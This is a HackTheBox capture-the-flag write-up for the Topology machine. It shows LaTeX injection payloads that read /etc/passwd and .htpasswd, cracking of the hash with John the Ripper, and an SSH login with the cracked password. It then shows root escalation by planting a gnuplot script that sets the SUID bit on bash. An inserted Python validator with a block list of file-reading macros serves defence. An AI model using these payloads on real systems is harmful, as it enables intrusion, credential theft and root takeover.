HackTheBox: Topology

Table of Contents

[TOC]

Topic

Lab

HackTheBox:

https://app.hackthebox.com/machines/Topology

Initial Enumeration

● Start Machine

Solution

1. Attempt

1.1 Edit /etc/hosts

/etc/hosts

10.10.11.217 topology.htb

1.2 Browse http://topology.htb/

1.3 nmap scan

nmap -sC -sV -T4 10.10.11.217

1.4 dirsearch scan

dirsearch -u http://topology.htb/

/.htpasswd_test
/.htpasswds

1.5 Subdomain latex.topology.htb

Edit /etc/hosts

10.10.11.217 latex.topology.htb

1.6 Attempt LaTeX Equation Generator

Test:

chwchw

http://latex.topology.htb/equation.php?eqn=chwchw&submit=

2. Command Injection

LaTeX basics: listing source code in LaTeX. ● \lstinputlisting{} is a command, not a math symbol, so wrap it in $ $ to close the surrounding $ math delimiters that the page puts around the input.

$\lstinputlisting{/etc/passwd}$

@hewen
\input includes another LaTeX document; \lstinputlisting includes an external file.
$\lstinputlisting{/etc/hosts}$
eqn=$\lstinputlisting{/etc/apache2/apache2.conf}$ # Apache server config
$\lstinputlisting{/var/www/dev/.htpasswd}$

Get user/password

vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

user: vdaisley
password hash: $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
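A server-side input check for an equation endpoint like the one above, added here as a defensive example (it is not part of the box or of the original notes): it allowlists ordinary math macros and rejects anything that could close the server's own $...$ wrapper or pull in files, which is exactly what the \lstinputlisting payload relies on. The macro allowlist, the length limit and the function names are assumptions; in production this complements compiling with shell escape disabled rather than replacing it.

```python
import re

# Allowlist of harmless math macros (constructed for this example; extend as needed).
ALLOWED_MACROS = {
    "frac", "sqrt", "sum", "prod", "int", "lim", "infty", "cdot", "times", "pm",
    "alpha", "beta", "gamma", "theta", "lambda", "pi", "sigma", "omega", "to",
    "left", "right", "partial", "nabla", "leq", "geq", "neq", "mathbb", "mathrm",
    "hat", "vec", "bar", "sin", "cos", "tan", "log", "ln", "exp",
}
# Escaped single characters that are harmless inside math mode.
ALLOWED_ESCAPES = set("{}_^&,;! \\")
# Macros that read files or run programs when the equation is compiled; the
# allowlist already blocks them, naming them only gives a precise log reason.
FILE_OR_SHELL_MACROS = {
    "input", "include", "lstinputlisting", "verbatiminput", "openin", "read",
    "write18", "immediate", "openout", "write", "def", "catcode", "csname",
}
MACRO_RE = re.compile(r"\\([A-Za-z]+|[^A-Za-z])")


def check_equation(eqn: str) -> tuple[bool, str]:
    """Return (accepted, reason) for a user-supplied equation.

    The server wraps eqn in $...$ itself, so the input must neither close
    math mode nor smuggle in a macro that is not plain math notation."""
    if len(eqn) > 500:
        return False, "equation too long"
    if "$" in eqn:
        return False, "'$' not allowed: it would close the server's math delimiters"
    if "%" in eqn:
        return False, "'%' not allowed: a comment could swallow the closing '$'"
    if "^^" in eqn:
        return False, "'^^' not allowed: TeX hex escapes (e.g. ^^5c) can spell a backslash"
    for m in MACRO_RE.finditer(eqn):
        name = m.group(1)
        if name in FILE_OR_SHELL_MACROS:
            return False, f"\\{name} reads files or runs commands"
        if name not in ALLOWED_MACROS and name not in ALLOWED_ESCAPES:
            return False, f"macro \\{name} is not on the allowlist"
    return True, "ok"


# Inputs from the writeup (the benign test string and the payloads) plus one variant.
SAMPLES = ["chwchw", r"\frac{a}{b} + \sqrt{x^2}", r"\lstinputlisting{/etc/passwd}",
           r"$\lstinputlisting{/etc/hosts}$", r"\input{/etc/hosts}"]

if __name__ == "__main__":
    for s in SAMPLES:
        ok, why = check_equation(s)
        print(f"{'ACCEPT' if ok else 'REJECT':6} {s!r}: {why}")
```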

2.1 Password format: $apr1$

MD5: "$apr1$" + the result of an Apache-specific algorithm using an iterated (1,000 times) MD5 digest of various combinations of a random 32-bit salt and the password. See the APR source file apr_md5.c for the details of the algorithm.

2.2 John-the-Ripper tools

Hash cracking tool: cracks MD5, SHA1, SHA256, MySQL and NTLM hashes

sudo apt-get install john -y
john --wordlist=rockyou.txt ./topology.txt

password (cracked from the apr1 MD5 hash): calculus20

3. SSH Login

ssh vdaisley@10.10.11.217
ls -al

cat user.txt

4. GET USER FLAG

FLAG: 995aae620785c32d38235ff75eb0cc34

5. Gnuplot

● Gnuplot: plotting tool (driven by .plt script files)

ls -al /opt

6. pspy Tools

pspy: snoops on running processes without needing root privileges. ● GitHub: pspy - unprivileged Linux process snooping

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64 # grant execute permission
./pspy64

6.1 SSH download pspy from local

python3 -m http.server

vdaisley@topology:~$ wget 10.10.16.35:8000/pspy64

vdaisley@topology:~$ ls
pspy64 user.txt
vdaisley@topology:~$ chmod +x pspy64
vdaisley@topology:~$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d

6.2 chmod new .plt file

Gnuplot privilege escalation: chmod command

vdaisley@topology:~$ echo "system 'chmod u+s /bin/bash'" > /opt/gnuplot/chw.plt
vdaisley@topology:~$ cat /opt/gnuplot/chw.plt
system 'chmod u+s /bin/bash'
vdaisley@topology:~$ ls -al /opt/gnuplot/chw.plt
-rw-rw-r-- 1 vdaisley vdaisley 29 Nov 1 04:22 /opt/gnuplot/chw.plt

@hewen
When this file is executed, it runs as the file's owner rather than as the current user.
Although an error appears on execution, the file attributes still changed.
/bin/bash -p

vdaisley@topology:/tmp$ /bin/bash -p
bash-5.0# id
uid=1007(vdaisley) gid=1007(vdaisley) euid=0(root) groups=1007(vdaisley)
bash-5.0# cd /root
bash-5.0# ls
root.txt
bash-5.0# cat root.txt

7. GET ROOT FLAG

FLAG: 2cf94752042e7319560bf84534369988

tags: CTF Web nmap dirsearch Command Injection pspy John-the-Ripper MD5